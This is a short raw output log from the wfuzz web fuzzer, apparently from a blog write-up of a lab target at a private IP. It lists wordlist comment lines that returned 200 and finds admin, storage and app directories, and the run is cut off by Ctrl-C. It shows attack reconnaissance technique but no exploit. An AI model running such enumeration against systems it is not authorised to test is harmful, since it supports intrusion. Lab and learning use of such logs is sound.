000000006:   200        50 L     181 W      2991 Ch     "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                                                  
000000010:   200        50 L     181 W      2991 Ch     "#"                                                                                                                                                              
000000014:   200        50 L     181 W      2991 Ch     "http://192.168.56.187:18888/"                                                                                                                                   
000000009:   200        50 L     181 W      2991 Ch     "# Suite 300, San Francisco, California, 94105, USA."                                                                                                            
000000002:   200        50 L     181 W      2991 Ch     "#"                                                                                                                                                              
000000013:   200        50 L     181 W      2991 Ch     "#"                                                                                                                                                              
000000012:   200        50 L     181 W      2991 Ch     "# on atleast 2 different hosts"                                                                                                                                 
000000011:   200        50 L     181 W      2991 Ch     "# Priority ordered case sensative list, where entries were found"                                                                                               
000000008:   200        50 L     181 W      2991 Ch     "# or send a letter to Creative Commons, 171 Second Street,"                                                                                                     
000000004:   200        50 L     181 W      2991 Ch     "#"                                                                                                                                                              
000000005:   200        50 L     181 W      2991 Ch     "# This work is licensed under the Creative Commons"                                                                                                             
000000259:   301        9 L      28 W       325 Ch      "admin"                                                                                                                                                          
000000482:   301        9 L      28 W       327 Ch      "storage"                                                                                                                                                        
000000909:   301        9 L      28 W       323 Ch      "app"                                                                                                                                                            
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending
posted @ 2022-11-18 16:31 Jason_huawen